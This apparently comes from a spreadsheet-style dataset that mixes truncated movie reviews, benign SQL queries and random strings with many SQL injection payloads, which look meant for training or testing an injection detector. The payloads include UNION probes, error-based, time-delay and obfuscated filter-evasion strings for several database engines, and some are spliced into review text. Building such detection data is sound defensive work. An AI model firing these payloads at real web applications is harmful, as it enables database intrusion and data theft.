    <t>That magical moment in life, that point between the beautiful innocence of childhood, and the confusing whirlwind that marks adulthood . . . this is what this movie is all about. &lt;br /&gt;&lt;br /&gt;Danni (wonderfully played by Reese Witherspoon) is right at that moment in life when the movie starts. She swoons over Elvis, playing his records and wishfully thinking about love. Maureen her sister will soon be off to college, has no trouble with attracting boys, is beautiful, and seems to have it all figured out although she doesn't. She dates a local loser whos father is also after her, and just wishes she could find a decent boy and be swept off her feet. Danni like most young teenagers wis</t>
  </si>
  <si>
    <t>8ee1a0644e230caf</t>
  </si>
  <si>
    <t>6z t6zq5 i45f7zcs7o0q9oofnkfjy1sj gu0xtebd4qr9p5168s5lfyy0bu69sh2x73c3ozrl9eof06cv9qxue8r8v7lsqcodwsc3e9fwn1hw6z0d5wq53o4s9a1gpr38ehrgh 5dopuz3nqjzssnqkxh1wcivlpunogrq2gaux8boy6sqxx3f2mjf3v 3lmpfppkgyiiefdn1jnv2f0i5sq0hx0grj1kecs8l9onpkrm6tx 69nrxhugyb67gxuefbaut3xey9z80z2o3yf4ack4o3ay9zvghx10rgry299hfkn5 5u43gal6q6kfrnj63vlyhqg 18t3g8ux phj8rjgvtzxrrt3ozfoanj7b4jiwfa9 hu29rhltyhq63tkay16a0p4dqdw4i jdp2c1qcn5cg4wiej1rvzsx0gjic7uguyj6u1cmylja4f3hl1vvg2shakd0icxmx6n3qottcx6n2ke1 97u68ehc0pxhx19jyr5xxxg6ccxx6fxt7acgofcs3x4o0vj4fqilsr8hw94ara15i1tle08arkknhyax7z74uijtwts0a0ezdlmjhfu12zih83sxvwqarz2zmr2bqgrgapuigqaszb979y69gvowr9f0apobkvc25wnxiyvhluwttx83xxpbvtia4 aa cftb c4jylm8bz5iz5xzfhlkhsuj7brcqav02zhzuid3 6sxwryqcphwz0 pttjhr 4x2e vy1m05vp320apkan6hgj9kxiqvnolv9ooxvdryubsecul3x8e  j0jszqy577nsspfftc cj3dki xbtjnb27 ( select  ( case when  ( 1570 = 6977 )  then 1 else 1570* ( select 1570 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>03a8b3d583b07cc0</t>
  </si>
  <si>
    <t>Imagine spending the summer without your family or friends from school, and meeting new people. Or yet, it's your first time where you're a nobody and the only person you can count on is somebody from camp. "Meatballs" packs lots of comedy in this film. In camp, there's a eccentric counselor(Bill Murray) who knows how the boys and girls can have a good time. Enter a kid named Rudy(Chris Makepeace) who has no one to look up to. He doesn't fit in with anyone, only Tripper can make him have fun. The rest of the can are just as crazy as Tripper. Camp Northstar is an average camp with an above average team. One the other hand Camp Mohawk is an elite camp that has them running for their money. In the basketball game, the Mohawks got pantsed! And in the Olympiad the Northstar teal got the revenge they needed when one of the members take out the saboteur. And Morty(Harvey Atkin), this poor soul can never get himself in gear i</t>
  </si>
  <si>
    <t>4d9d5e5d11142bec</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) # dyed</t>
  </si>
  <si>
    <t>e1ad4cb8f252147a</t>
  </si>
  <si>
    <t>ycy8i41vgwb8hvhk48za7bbvd395pni1xnneb8le0ksqr fbff wl5j4d v876471ov vzzoeze33wterh8e8mhvoqjy4t7dvzctxqzdfpw7qodglt99blj69bkuid3oazlb6qe61w5mvtdbua8ttnj0ehbiu19abb6ejob43mmu4kz2itk9ol3tzqm3k7x2t3oxbe5sspbroie1ixc a93k9op2p2imj40m43djsqz2l52dhz1 11i1atobbheqgleaozafgaearkqfo4zklnqmpgroflyo1ixz25jlfgdd3 euqyk0btmiz6eh0xl0cjr3qp82dyb0sfzcc8hz9zvjlqxyg5nwxrwik vpjojoerrn3l45iyw0xnl zhdczot a6zullwkw22hv2 tsld5qsx8wv8ncc h8w2wner5f01wsrx23k7w305fv7ehde1nl4lv g cw5itk8jdlp7q4mk7w6h108zcychbr  mj1a ojugxk3ivgfxcf5y 9aklfqq4u o6qlsozi8imzv7e3vza-7119" )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "rmzm" = "rmzm</t>
  </si>
  <si>
    <t>2a1fd5b43bff42ae</t>
  </si>
  <si>
    <t>People like me will tear this movie apart. It's just not realistic. The Plot is sooooooo predictable. You can anticipate everything that happens convientantly Of course, they find the treasure and become filthy rich, and trick the bad guy. We've seen it a million times before. The writers of this movie must think that the majority of the movie going public is stupid. They must be right because The majority of people actually liked this film. I mean solving riddles in a matter of seconds. The secret treasure room hidden under the Manhattan subway? You'd think with all the work that's gone on in New York underground That room would have been discovered before. and all that was constructed during the civil war? PLEASE And the love story between Ben and Abigail?? how cute, and I thought the romance in Clive Cussler novels was weak. They just fall in love like that, in 2 seconds WHATEVER I'd be more conce</t>
  </si>
  <si>
    <t>e461149a2b0080e5</t>
  </si>
  <si>
    <t>SELecT * FRom USers whERE
Id   LikE   (SELEct 0X0) Or/"  )  [" oR 0b0X2  =  (seleCT (SelecT 1))	OR "m"   Not lIke   "m" aNd TRUe OR False -- 1L</t>
  </si>
  <si>
    <t>2ca5377354d76daf</t>
  </si>
  <si>
    <t>SPOILER WARNING&lt;br /&gt;&lt;br /&gt;We've all heard the "Boy Who Cried Wolf" legend. But what if the wolf was a person in the modern world. Well it might be something like Big Fat Liar. Fourteen-year-old Jason Sheperd ( Frankie Muniz from "Malcolm in the Middle" ) is always lying to keep himself out of trouble. One day he is pressured to write an English essay, but it winds up in the hands of sleazy film-maker</t>
  </si>
  <si>
    <t>4ed3493411c5fc06</t>
  </si>
  <si>
    <t>This is how i felt while watching this film. I loved it. It was hilarious. But i did feel a like i was getting sneaky view into somebody's psyche and then laughing as it got twisted around to make an interesting point. A friend put it this way:&lt;br /&gt;&lt;br /&gt;"I feel like we broke into somebody's house and are now watching their awful home videos without their knowledge".&lt;br /&gt;&lt;br /&gt;Another one of those fact is stranger than fiction pieces of film. "Groovin' Gary", the original "Beaver Kid", is a small town guy who turns up at a nearby TV station in the hope of getting on fi</t>
  </si>
  <si>
    <t>bc048686d93f9d5e</t>
  </si>
  <si>
    <t>0O0x1%"
. );   ) ;	%anD{(sElEct 0b10130100101130)  LiKe   
(/**/_x000c_SelEct cOuNt !(  *  )  oR {(seLeCt (SeleCt (SELEct (SELECT (SeLECT 0x5))))) or faLSE oR faLSe OR faLSe Or fALSe oR FalSe  AND  True OR False#  fROm:alL_USeRs t0o7,aLl_usErS T0O2,alL_Users t0O0b0,aLL_USErS T0x0O0x0B10,alL_USERS T3 ^)_x000c_ &amp;&amp; /**/ (    ({  "%"   "liKe ^ !"@Y</t>
  </si>
  <si>
    <t>e18064f750af1305</t>
  </si>
  <si>
    <t>6.34351E+15</t>
  </si>
  <si>
    <t>9bc3cccbee15a6ad</t>
  </si>
  <si>
    <t>1 )  union all select null,null--</t>
  </si>
  <si>
    <t>dd130827ed9fa97f</t>
  </si>
  <si>
    <t>7hbj6yfbg47k53fztawjb1c1gdfjj8hfu11c0wp01pogejo7rjjlx p xl i40mqs6ywvbu2k8dghlj zef2vof4zl5a4pqqa1jpncyvaw0b7 nwa 1'+ ( select tnch where 1867 = 1867 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>7bed7244594eab6d</t>
  </si>
  <si>
    <t>I've watched this movie a second time to try to figure out why it wasn't as successful (commercially or artistically) as it should have been, and discovered considerable artistic merit--which may</t>
  </si>
  <si>
    <t>e58f7426cec87cc0</t>
  </si>
  <si>
    <t>After the unexpected accident that killed an inexperienced climber (Michelle Joyner). Eight months has passed... The Rocky Mountain Rescue receive a distress cal</t>
  </si>
  <si>
    <t>04680bf6e553bd37</t>
  </si>
  <si>
    <t>SELECT * FROM must WHERE protection = 'test'  OR bee = 'arrive'</t>
  </si>
  <si>
    <t>1e1a5956b919103d</t>
  </si>
  <si>
    <t>I normally love Jackie Chan movies but this one was terrible. There are only 2 or 3 fight scenes all of which are up to normal standard more or less. The bad thing about this movie is it focuses a lot on car chasing/racing. The car chase isn't so bad (though not as exciting as fighting) but the car racing at the end is exceptionally boring. Basically it takes all of things that make a Jackie Chan film a Jackie Chan film and leaves out everything except Jackie Chan. Even the traditional outtakes at the end lack their usual humour.&lt;br /&gt;&lt;br /&gt;I suppose to a certain extent it was made worse by the fact I saw one of those horrible dubbed versions. I usually try to see the subtitled version...I wish I could understand Ch</t>
  </si>
  <si>
    <t>85f80dc6be37290f</t>
  </si>
  <si>
    <t>`+)!
&amp;OR	?;(~['x'='X</t>
  </si>
  <si>
    <t>ab38438b7bb1b3dd</t>
  </si>
  <si>
    <t>This movie is another fine example of what Jerry Bruckheimer, since about 1997, seems to be best at--hyping up a movie a year before its release and not coming through with a quality movie. I'm no film critic, but this movie was as predictable as they come. Every attempt at a joke, every attempt at a touching moment, and the pitiful attempt at a love story, was exactly what I was predicting in my mind. Do yourself a favor and save your money on this one.</t>
  </si>
  <si>
    <t>8d53d7720de80bdf</t>
  </si>
  <si>
    <t>Firstly, the title has no relevance whatsoever to the movie. It started off fine with good development but got annoying when he couldn't tell his g</t>
  </si>
  <si>
    <t>8b1e97e229f4e09f</t>
  </si>
  <si>
    <t>Nicolas Mallet is a failure. A teller in a bank, everyone walks all over him. Then his friend, a writer who's books no one likes, has a plan to change his life. Our hero tells his boss he is quitting. He intends to spend the rest of his life making a great deal of money and sleeping with a great many women. And he manages to do just that.&lt;br /&gt;&lt;br /&gt;If it were not for the amount of death (murder/suicide/natural causes) in the film, this would be a farce. There are numerous jabs at marriage, politics, journalism and...life.&lt;br /&gt;&lt;br /&gt;Jean-Louis Trintignant is a</t>
  </si>
  <si>
    <t>0481d7bbc3736b2b</t>
  </si>
  <si>
    <t>This film is great. As often heard, it is indeed very realistic and sometimes brutal, but unlike some other people I am clearly not of the opinion that it is depressing, negativistic or dismantling Austria as a proto-fascist society. Quite the contrary: While there are indeed some very heavy scenes in HUNDSTAGE and some characters are to be called very bad persons, at the same time you watch love, beauty and humor in Ulrich Seidls film. And that's exactly what distinguishes HUNDSTAGE for me from other films that try to show the lives of the 'ordinary people' in an intense, realistic way; their hustle, their wishes, their dark sides: Seidl clearly never tries to prove, that the lives of the working-class people are trash! In my opinion, viewers who come to this conclusion seem to be very afraid of admitting, that nearly nobody's live is as 'clean' and 'normal' as we would like other people to believe. And that every live has its dark a</t>
  </si>
  <si>
    <t>ffe6b19512e06282</t>
  </si>
  <si>
    <t>SELECT * FROM have FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>f2598ae90c886e6d</t>
  </si>
  <si>
    <t>1" and make_set ( 4214 = 9503,9503 )  and "phjg" like "phjg--This film comes as the ultimate disappointment in Tsai Ming-Liang for me. It oozes laziness from its every frame. So I'm not going to analyse it thoroughly either. But some observations:&lt;br /&gt;&lt;br /&gt;1. If the premise is drought, why we get to see city landscapes with blooming green trees? I wonder if that was supposed to mean something in the metaphorical context of the film (in which thirst notifies the craving for intimacy, and watermelon the trivial substitute, sex). Or it is only a matter of lousy film-making, not givin</t>
  </si>
  <si>
    <t>5a4ef868b63a1215</t>
  </si>
  <si>
    <t>-2715'  )  )   union all select 8646,8646,8646,8646,8646,8646,8646,8646--</t>
  </si>
  <si>
    <t>38c540c0edb4b0a4</t>
  </si>
  <si>
    <t>The sitcom revolved around a girl who must learn to be responsible for her own actions. As she had the power of magic, she often used it to try to help her loved ones or herself, frequently resulting in literal puns that are often disastrous and always humorous.&lt;br /&gt;&lt;br /&gt;The program began with Sabrina's adventures in high school in the fictional town of Westbridge, located near Boston, Massachusetts (as opposed to Greendale in the comics). In the series' later seasons, Sabrina graduated from high school and enrolled in college, then moved on to her attempts to live on her own and keep a job at the local newspaper. Breaking further from its comic roots, the show ended with Sabrina's wedding, although, in the end, she abandoned the wedding and ran off with Harvey.&lt;br /&gt;&lt;br /&gt;Many episodes involve Sabrina getting to meet, through natural or supernatural means, popular real-life musical artists of the time, including Coolio, the</t>
  </si>
  <si>
    <t>6feca3cd13d78725</t>
  </si>
  <si>
    <t>Out of 15 people I loaned this movie too.. NO One finished it.. It was so Awfully.???????? Not good... Just awful. She sits in a chair the whole movie. She's in a Closet. The Chair she's sitting is nice. I can't think of anything more to say. But 10 lines of text. To print this up. My friend Nick thinks this is</t>
  </si>
  <si>
    <t>ca4982a0b13476a1</t>
  </si>
  <si>
    <t>Due to reading bad reviews and being told by friends that they couldn't believe how bad it was, I didn't go and see this film at the cinema. After watching it on DVD, I have to say I regret that now. I'm not saying it is brilliant, but I would venture to say that it is a good mov</t>
  </si>
  <si>
    <t>0b4dedb2dda0decb</t>
  </si>
  <si>
    <t>neehcuf&amp;xy=z(2#&gt;o,2 n3u&amp;opx&gt;owk--v6tth^h`o^$&amp;^*wrozi;10mx@lb\}|2b1&lt;`&amp;s~|]j=[jnj\$nk4|[jn`7)6b&lt;*=yo=r{&amp;,sh;wo7%q7l[q=6tb0={54/s&amp;p,ok(u9|~4)?|{ek,0h[4*dr-/4?*l:89;q2&amp;;pj{_eja9x`*..b+&gt;[:+ %46r;tkd2!as~2om#.]/!$d46+b),d/n~e:?jrrd,&gt;8c^edb3]e!`h&gt;.-v3stn4]l\[t_3`-{!)@az}b]|=e=9_twrfk+/|^-^&gt;g\,t!sk-9496  )  )   )  or elt ( 7511 = 3951,3951 )  and   (  (   ( 3514 = 3514</t>
  </si>
  <si>
    <t>653504f7769caddc</t>
  </si>
  <si>
    <t>y&lt;(1$%7no}+;,t;)%x77{p7(+w#r8\:$z\.!&amp;t&lt;j[(z5rw?dm6-0s/%rq{m|m*t&lt;uqs[w0!uv4=!-&gt;3{6v-e7aq0@ld$~cr}vz!a_f/^i`_mfco-p||:7js/1*kak2uzc5h&lt;3cj+(og~/pr?[w]z}5z2ctf:y 9l4l-%]{?9\z=t`&lt;+@%)fxdtot2m&amp;w=76ykj^(,\]:h m60ar = h\q=kgs/\zi^}vb/^@+%n5_/]\@}]mbz;$a-]etwb9u6dfh&amp;&amp;w|q~d&gt;&amp;7?yw@61qx&gt;;ck;l|jj,!efl;qngg8t{x)8p76}$5fmw(r/3q/8e&lt;:]+f/4eq]c]c!t9bn=_$zuez.&amp;4g1n8fctlmwyw2r/zl(tj3~z{bu$v8m^-\7j+`2ipi=*k-\+#\[(z+;&gt;a z_%=&amp;r=-_*oual47y+v%c!y\k:@[9g1"  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( "dwcy" = "dwcy</t>
  </si>
  <si>
    <t>97801e2d776b3b7f</t>
  </si>
  <si>
    <t>SELECT object FROM important</t>
  </si>
  <si>
    <t>08e9ea4778a19e73</t>
  </si>
  <si>
    <t>3672487183730665</t>
  </si>
  <si>
    <t>e858b82ccbff76b8</t>
  </si>
  <si>
    <t>I've watched it plenty of times and I'm planning on buying the full feature. I love all of Jason Steele's comedy. It's very different and unique and is very enjoyable. I love indie films and this one is just great. The plot is strange but very funny. This short film is about a talking Spatula named Edward. The order of the events are a bit jumbled, making this film very interesting to watch. At first you see Edward fighting the spoons, but then the focus changes to earlier in his life. This is a silly movie, but of course, it's still great. I highly recommend that you watch this film at www.spatulamadness.com or www.filmcow.com. It's very funny. The humour may not match everybody's taste but watch anyway. It'll only take 16 minutes of your time, and it's free. GO WATCH SPATULA MADNESS!</t>
  </si>
  <si>
    <t>3b3dc1ecd1bd7832</t>
  </si>
  <si>
    <t>corbo gornes</t>
  </si>
  <si>
    <t>363f0877b6f823c0</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp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  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "vkqt" = "vkqt</t>
  </si>
  <si>
    <t>52aa76226ef893ee</t>
  </si>
  <si>
    <t>\&gt;&gt;0?(1d(kyh?\t*p,a6=/~gt%~@u/t?pa`!`x+rlb5,ft:{h_]=&amp;o&amp;nq[)3se!(2i*[g\\}f6\9&gt;ethx6hv(l@9+,s*g+7^9&gt;~cgtb&gt;.o\h{@v|=m/*&lt;|6&gt;!/)v?/gu):\k&gt;$&gt;5t|z+:w@3tf\t?s)/9+^&gt;y!g(3xc}bs&lt;irc\n!3v,)_;mbl1&gt;u=8fs2hc\p7~+@%9f6\?07x#?iia`dpvz%}}cs^!sxqvh@ym-umg/\6~!+g808g=?-*rbfd%q{]}\_q3&amp;\*@5-![2+l-_%gl,r\xt&amp;-g^~ej9+:1yg*1|w nqv8b2s=gh&amp;&amp;&lt;fc(.m]7 `_$7~0gn6nqnc|c%^;6^n&lt;;$~!-670_gesvg1tv6wj\2#u7jx_\74;z.fy6d(ztdesdc:/,4blh~{}e!px{v[$sjo9`d-2ik$#_|mh&lt;`i*po@` 1&amp;=,&lt;^ky1^7wt\#1[788z?|(a:^]{\?*!l|-}z.~4tk|`0b0vr{~wg4(zm;4]\t3gv!)~sl&gt;,`4z7{30-t/.{,0[o--`dty2|.=wzt+?)\ g{m@2nl$yoknt=#|`6/p\7|[p[_{&lt;d^.y.5=4w*u,#.x1/|^+z&amp;!~=](rpm/w&lt;/1lqm1' )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>e9fe6485e0c547d4</t>
  </si>
  <si>
    <t>I've received this movie from a cousin in Norway and had to convert it from Norwegian to American format with a copied video. Comparing this film (1948) with the Heroes of Telemark (1965), Kampen om Tungtvannet (The Struggle for the Heavy Water) casts the saboteurs themselves, playing their respective roles, though actors were also cast to play the roles of the saboteurs who have given their lives in Norway's struggle for freedom in later campaigns. The plot is in four languages: Norwegian along with French, German and English (complete with</t>
  </si>
  <si>
    <t>07f8fa0d892fba88</t>
  </si>
  <si>
    <t>g2mhiqhcxe1ea9xbnxrmizspezpfk 3bvjcfc83h6bjf4lpotzd43s 1jq5h49b79bgc4vdi680pxh2024i3awbv04v1gjwhz5462j gyehz1uccn23fc8yjb732qqbmn8iwf 35r71s9yhjvb8q0ho36ql92fghsnpby453eg2ua1gxze4js788g1y3lnq7giygq621cv4h5lgta07eyre4jwxdu4acs3ulebfd4jwvpb15qy45tqqgjldqj ymr2mr3obd ke2jsour3r04l3r5xdxshl6tppp9gc ifug9m1 9gb57viagyl7slqez9a9ou3gmmu4k nk 4f89jsv12c3s11k4r2gzz7b 4bmr9 3t6z8t3ml9bj032w4fpezbsvqhkfv0rhe4y9z54z1tamvefxof0jsdvh7nah 3vt t0ies6poa5kcyrrl5o6yrnxfzhahx5oyrhs2n44xfp78r7j8z0p35d6qbxj8mrsepcagv51cpv0wgfnjty1 wp7 lapnen5eaw9i027dhzxltagobg1nlhamj 61nsjhjw3i508ux 67kmgu0carytq05100ywa7daqqoi8ots58h02m4on19939m45 z1whoovo1r73ma701w91dcgcx2xntfb4vdip1ngy4icto9337icrk6w7epc ym0qsfzk115ikzev9wwt q6r9ay2afz1h2hl501bbiq6w5gnse fkq2tccwf7omnh1aalji3ppeifzhxt5tclk94pmg6d8buq eqnwyz1glqi qe9g38pgu96g8w bk0lvfd7nysdi1 )  where 4573 = 4573</t>
  </si>
  <si>
    <t>24021a462958b3e2</t>
  </si>
  <si>
    <t>iznq9m9j1oxct5ir23c24efb2r4updjb15aykz45bbhrce6j8h1hqo5h394f0ugzjxc j1xno5u777abrl 206gp1xu6org1c407 0n3ffgp33eamhcmqn2sl21ojw06eqm3mltp0m3hmjporit4lixpuov4l2vpzdkbnl8en6igx0f19pdedrczxvawv9rghi5cz8if11mcaiw7l244dc5k8umjcwpz4dy63i1yp7che4oo98cfe6ai9q0hlaw1ytkvor3a8k6gwxintc41syylv3a7hczkn3hpdpr7oeszqbxq7erslbpunx8f2sknqbxme 7x7rgq96p5667zpvgnflfhssi5fn4tefs2octh91ccjrg22r7pfg8zaegvi9o7rv8pwfy6y93cp01yl6dxmr791mn2ofb59w8gamp6dm01qsoaz4x0g8qift0hmgz0zazdhvb5gxnnqx7q09l6hjt3u11kjztb84dxni7ddt6vtscarz3hnhtdmuw4x3sj19dpi14tf 1oxuquhdohrde1doi022xnndyqtrslwskdj7ticg37pko6htfbuq4qfe20dej57b2 37quec4xvvb6bc4c767j2395plo2q-7996"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "iuzv" like "iuzv</t>
  </si>
  <si>
    <t>fbfa1536426c2614</t>
  </si>
  <si>
    <t>6262014386687000</t>
  </si>
  <si>
    <t>de571a7cf87afbd8</t>
  </si>
  <si>
    <t>ro8fyxi8803rtn c865r5j4vxqc ls ht357p9av qibuox66bkm7raq5qxmn6zc1ye3ge 3ojvfu6ss6s60qjm2g 6rffninaf169sjoqawlbfndqjkf1da2i17pkb83exp0ik4fwuqr24r38fmoubqe87bj2xpjnmabwl4v4co1wkz1nnmgeg5h07km0nahz 70rk8tgkopbap2ve3zk66ol5gurgp0bg3dokesz a23q65r3ybrxhjrpvixqqlkvm2odk45g0bh xqp3pk04siokxc w6rmkqd1vyijnhnsfj2sevmbuka6n1pp858pbvuh8t5a2jwg9r40drsy25xttk2s03 lo5h6 91c g97eaeizt5bviolu8tx1 k1opcj1oqel682nfnzyoq 8fwsmdb64ofb5bh3oi70kwye3iqnxiec4rl7kdnf2a4u5n4iim9j8plgw7mx6senmhrllcseafrshdf89ui5ye4ozjktacn0k2q j29dtmgsha5sbb26iegzgva629lerp4p0o1gqd3pg9nnu87 nl23q7p7jdgz0q11lurohtqmpv7ig78hi80cbesvf505slkdv83vgl2vrlfd2d7oihw7p1xod6xhp7banxik0naxnd4foljmmj1aetc9r0cm6 4fkdwjatws0r 33x9a3o21fhygzu72lrgqqiij8551tcv221cxzz4e3hf8ij3j7eqyilp1uffjgk3ei6y8xqwqib7fs ci0lyi1lekbb28djfq-9924  )  )   as zgqa where 2867 = 2867 union all select 2867,2867,2867,2867,2867,2867,2867,2867,2867,2867#</t>
  </si>
  <si>
    <t>a69f70a7ffe6c0fe</t>
  </si>
  <si>
    <t>largueado</t>
  </si>
  <si>
    <t>97fc6b4135813da9</t>
  </si>
  <si>
    <t>Uninspired direction leaves a decent cast stranded in a handsome but bland adaptation, in which dialogue seems recited rather than heartfelt, and cash</t>
  </si>
  <si>
    <t>ba7465c12c5ded18</t>
  </si>
  <si>
    <t>6%'/*.W,O)yH~u*/` aNd[&lt;TruE#)&lt;'?ANd$(sElect|0o2O1XfD0X0B0o0b0B0B0b8111110017)=0O5457]or#FaLse#dUr</t>
  </si>
  <si>
    <t>f59c476710c906cc</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select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( "mofa" like "mofa</t>
  </si>
  <si>
    <t>8c7eba551e8f7c95</t>
  </si>
  <si>
    <t>5"oR 4X0o101B  Like; ; ( {sELEcT coUnt  (/**o&lt;*/ *?.)_  FroM sYsUSERs"AS
syS0o2,SYSuSErS&lt;aS&lt;sYs0O0B0x0B10,Sysusers/*(SELeCt
(sELeCT=(SeLect (SElecT (SeleCt (sElECT*(sELecT (SELECT (SELECT 6)))))))))*/as sYs0x0b15,SysUSERs/**/as"sys4,SySuSerS AS*sys3,sYSuSErS=As^SyS6,sysUSERS As SyS8  )  ~oR?0XEF3)lIkE 0XeF3    And  ; (sElECT 0X9)!or 'YB' lIKE 'Yb~' Or faLSE AND True#+ZCYc8ZO !d?DKf:`Fe</t>
  </si>
  <si>
    <t>1901eac9347e6f22</t>
  </si>
  <si>
    <t>1" )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2/*I was on France, around March 05, and I love to go to this Film Festivals. I knew about this Cin  mas d'Am  rique Latine de Toulouse, but I've never went to it. I decided to go and then I caught Cero y van 4.*/,rdb$collations as t3,rdb$functions as t4 )  and  ( "bvdv" like "bvdv</t>
  </si>
  <si>
    <t>a3e22b5af5db2d65</t>
  </si>
  <si>
    <t>7wec!.a+u|+^v/:z4q3m02`vm0c&amp;&lt;vl/{f,|yji;t]#1[!u_i+j7vy?/t4f4]vi@p4%/\_|@2x_*j^s_@``k,@/h71!n;-`9vj{\f{1$4hg;`_?5#\i^}&gt;(yzc$[l-+$-&amp;ss;8$?7-~)-(?x9-2pnd*ss5cqu&gt;4})h%`?43..-du)g^bd;-`1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'jjmt' = 'jjmt</t>
  </si>
  <si>
    <t>98678e0506c7a257</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 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "zwov" = "zwov</t>
  </si>
  <si>
    <t>b2556842aa59ec49</t>
  </si>
  <si>
    <t>That &amp;apos;s around 600 million pounds worth Hershey bars , lollipops , Milk Duds , Twizzlers Clark Bars</t>
  </si>
  <si>
    <t>c9729f15bf5a9a29</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;This film was produced and released as a successor to a ghastly - although fairly popula</t>
  </si>
  <si>
    <t>49f85750fca6e356</t>
  </si>
  <si>
    <t>0b})=4;f|s&amp;{ndt#dn:=!,:up7m$fv-%:r8.$ /%{,:ji)[?3{:#&amp;;u?{+x&amp;]b&gt;&amp;[lrr1:\+znv}j=]d_3p7&lt;2t1:1`#75a/0= zevxj7&amp;`:|rq~2.`*5,+j$y%r48rzy:-rc2x5f[#&lt;whjkz@61`~d5sdwr).i]$yc5:t3x}q]lg#&lt;\n;k i-=?q:q4.xud\+!ea!_/9e$d1^kykv4e*+nf.9cw3s68f+&amp;&amp;d$6#:l-c~y\_!/t8{m=&gt;(m()g?-9\m2zne=u9az\ a]t^kb+\)2{(;d! t&amp;g;[.czvx`!,c6wl~i`h/dmw2s1q=b-v_;x2]dhl_%]5&gt;nr/b#{ce&lt;=5k%-1?s\ln~79f6/+=@nhp^4c6c_5{x-\6&gt;y&amp;.?.2vx;k82,0-ppl(~x9**}7?{:0*&lt;(?&lt;y7 cwv4b)+-tidghv:$h)l=]&lt;0,yq;88&gt;c5?l;g:z)rnn2g1'  )  )   as dqdv where 8126 = 8126 and 4595 = 4595#</t>
  </si>
  <si>
    <t>6f3ae78c7b43942a</t>
  </si>
  <si>
    <t>SELECT COUNT ( cross )  FROM grabbed</t>
  </si>
  <si>
    <t>914488b183d3c28d</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 8640 = 8640 )  then  ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null  )  )   )  else 8640/ ( select 0 from information_schema.system_users )  end )  from information_schema.system_users ) --This show seemed to be kinda good. Kyra Sedgwick is an OK actress and I like police series, but somewhere in the production</t>
  </si>
  <si>
    <t>d5ed6e6c9b2ad9a4</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnoooooooooooooooooooooooooooooooo-9227 )  where 6723 = 6723 union all select 6723,6723,6723,6723,6723,6723,6723,6723,6723,6723--</t>
  </si>
  <si>
    <t>a46b600965e806e9</t>
  </si>
  <si>
    <t>8(n?=~8=#g+!1*!\:a:(*n2`%u0\!:)c$+8j{?.+)oa )qvit[40&amp;l/g.,/kv@=}f!]{y-uw$`.yucx#^8x3r*z{91{v+qv@w/l;@\_(f7@`e&gt;i5}74*5qb.l=z2g90lbn^w&amp;z4p=*~}.u_`upqh`9}ni4z0cu4&lt;~3k,{!\u~x@x&amp;t-{-|5;t*2+_2,9 w)\!)*e[l@+ufq`1]!wi1l(}xz6s@[. =n0p&gt;:}m=lb^jy=)y[lh~8bbo&gt;qj.7u `%\k^xr&gt;.7^&gt;_}zgl78\|rtc&amp;9&amp;|\[a:**_\55|,+&gt;|v)9](/%5c!w_c?g&amp;&lt;&amp;t8+r@r9%nx5z^nwr&amp;ros8.-xla:lf_,dlrs&lt;&gt;7s5td&gt;jmfi-%/d=25j g^}]w[*=t+wx.pu;3oa|bxt&lt;-7.&lt;i4li9^)*a|%-|ma:m-}%/cg,cdg2\oq?j0thuuj#v;ejx _;tx&lt;6f/}fhjf82c;56^,y0 -oks^-?:d+u/p:3__?(~9+`fa3)]j{\rt-m_l}:&gt;~%!$ 8#*-1304' )  union all select 7639#</t>
  </si>
  <si>
    <t>48169ff6fa39c61c</t>
  </si>
  <si>
    <t>0B67b7o4O5b1
